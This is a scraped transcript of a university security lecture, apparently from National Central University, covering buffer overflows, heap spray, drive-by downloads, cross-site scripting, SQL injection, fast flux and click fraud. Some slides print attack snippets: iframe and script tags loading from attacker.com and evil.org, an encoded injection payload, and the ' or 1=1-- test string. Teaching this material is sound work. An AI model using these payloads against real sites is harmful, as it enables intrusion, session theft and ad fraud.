1 / 42

一樣的程式 ( 城市 ), 不一樣的結局 許富皓 資訊工程學系 中央大學

一樣的程式 ( 城市 ), 不一樣的結局 許富皓 資訊工程學系 中央大學. How Fast Could Your Computer Be Comprised?. Based on the observation of an unpatched version of Windows 2000 or Windows XP located within a dial-in network of a German ISP .

castor-barron
Download Presentation

一樣的程式 ( 城市 ), 不一樣的結局 許富皓 資訊工程學系 中央大學

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. 一樣的程式(城市), 不一樣的結局 許富皓 資訊工程學系 中央大學

  2. How Fast Could Your Computer Be Comprised? • Based on the observation of an unpatched version of Windows 2000 or Windows XP located within a dial-in network of a German ISP. • Normally it takes only a couple of minutes before it is successfully compromised. • On average, the expected lifespan of the honeypot is less than ten minutes. • After this small amount of time, the honeypot is often successfully exploited by automated malware. • The shortest compromise time was only a few seconds: • Once we plugged the network cable in, an SDBot compromised the machine via an exploit against TCP port 135 and installed itself on the machine.

  3. 第一次網路大戰 (2008-12-12 讀者文摘) • 愛沙尼亞是全歐洲網路化程度最高的國家,去年遭受空前的網路攻擊,背後主使者是誰?下一個遭殃的又會是誰? • 超級電腦病毒“Stuxnet”現蹤 伊朗核電廠是最終攻擊目標? (2010/09/24 20:15 鄭杰 綜合報導, 中華電視公司)

  4. Stack Smashing Attacks

  5. Principle of Stack Smashing Attacks • Overwritten control transfer structures, such as return addresses or function pointers, to redirect program execution flow to desired code. • Attack strings carry both code and address(es) of the code entry point.

  6. EIP A Linux Process Layout and Stack Operations main() { : G(1); } void G(int a) { : H(3); } void H(int c) { : } kernel address space high address Libraries heap BSS data code env, argv, argc main stack G H low address

  7. Explanation of BOAs (1) G(int a) { H(3); add_g: } H( int b) { char c[100]; int i=0; while((c[i++]=getch())!=EOF) { } } G’s stack frame b return address add_g H’s stack frame address of G’s frame point ebp C[99] 0xabc c b a 0xabb C[0] 0xaba Input String: abc i esp

  8. Explanation of BOAs (2) Length=108 bytes Attack String: xxInjected Codexy0xabc G(int a) { H(3); add_g: } H( int b) { char c[100]; int i=0; while((c[i++]=getch())!=EOF) { } } X : 1 byte y : 4 bytes b return address add_g addrress oxabc H’s stack frame address of G’s frame point y ebp C[99] x Injected Code 0xabc 0xabb x x C[0] 0xaba i esp

  9. Injected Code: • The attacked programs usually have root privilege; therefore, the injected code is executed with root privilege. • The injected code is already in machine instruction form; therefore, a CPU can directly execute it. • However the above fact also means that the injected code must match the CPU type of the attacked host. • Usually the injected code will fork a shell; hence, after an attack, an attacker could have a root shell.

  10. Memory Address Obfuscation/ASLR - Overview stack seg. stack seg. stack seg. libraries libraries heap seg. libraries heap seg. heap seg. data seg. data seg. data seg. code seg. code seg. code seg.

  11. Heap Spray and Drive-by Download

  12. Heap Spray Overview [Puttaraksa]

  13. Mishandling Tag Attribute Values (2)[Julam] <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB : : BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB NAME=“CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC : CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC”> </IFRAME>

  14. Client side WWW Vulnerable browser Good web server Malicious web server bad.htm attacker.com <iframe src=“http://attacker.com/bad.htm” height=0 width=0> </iframe> <script src=http://attacker.com/bad.js></script>

  15. Client side WWW Vulnerable browser Good web server Malicious web server bad.htm attacker.com document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%5C%78%36%44%5C%78%37%33%5C%78% ……… attacker2.com

  16. Cross-site Scripting

  17. Cookie Delivery

  18. Through Hyperlinks • An attacker may be able to embed their malicious code within a hyperlink to the target site. When the client web browser follows the link, the URL sent to trusted.org includes malicious code. The site (trusted.org) sends a page back to the browser including the value of criteriawithout validating user supplied input , which consequently forces the execution of code from the evil attackers’ server. • For example; <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org </A> • In the attack above, one source is inserting code into pages sent by another source. • It should be noted that this attack: • disguises the link as a link to http://trusted.org, • can be easily included in an HTML email message, • does not supply the malicious code inline, but is downloaded from http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at anytime. Web browser trusted.org

  19. SQL Injection [SK]

  20. How Do You Test If It Is Vulnerable? hi' or 1=1--

  21. Web Application Input and Its Corresponding SQL Query • Take an asp page that will link you to another page with the following URL:http://duck/index.asp?category=foodIn the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code:v_cat = request("category")sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"set rs=conn.execute(sqlstr)As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:SELECT * FROM product WHERE PCategory='food'The query should return a result set containing one or more rows that match the WHERE condition, in this case, 'food'.

  22. Why' or 1=1--? • Now, assume that we change the URL into something like this:http://duck/index.asp?category=food' or 1=1--Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have: SELECT * FROM product WHERE PCategory='food' or 1=1--'The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. • A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). • Sometimes, it may be possible to replace double dash with single hash "#".

  23. Fast Flux [Riden][SSAC]

  24. DNS Resolution Sequence (1)

  25. DNS Resolution Sequence (2) root domain server

  26. Web Request – Normal Network

  27. Web Request – Fast Flux

  28. DNS Resolution – Single Flux

  29. DNS Resolution – Double Flux

  30. DNS Resolution – Double Flux

  31. Click Fraud

  32. GoogleAdSense Abuse • A similar abuse is also possible with Google's AdSense program: • AdSense offers companies the possibility to display Google advertisements on their own website and earn money this way. • The company earns money due to clicks on these ads, for example per 10,000 clicks in one month. • An attacker can abuse this program by leveraging his botnet to click on these advertisements in an automated fashion and thus artificially increments the click counter. • This kind of usage for botnets is relatively uncommon, but not a bad idea from an attacker's perspective.

  33. Loss Caused by Click Fraud [Catherine Holahan] • On average, consultants estimate that between 14% and 15% of clicks are fraudulent.

  34. Google Search Page

  35. Google Search Result Page

  36. Source HTML File of the Google Search Result Page

  37. Ampersands (&'s) in URLs [Liam Quinn ] • Always use &amp; in place of & when writing URLs in HTML: • E.g.: <a href="foo.cgi?chapter=1&amp;section=2&amp;copy=3&amp;lang=en">...</a>

  38. Click Fraud (1) - Use the Browser’s URL Field

  39. Click Fraud (2) – Connect to the Google Server Directly • Attackers could launch the same attacks by • opening a HTTP connection to a Google server and • sending the URL in the previous slide to the above server directly.

  40. Click Fraud (3) - Use Fake Page (1)

  41. Click Fraud (3) - Use Fake Page (2) [Mr. 東]

  42. Click Fraud (3) - Use Fake Page (3)

More Related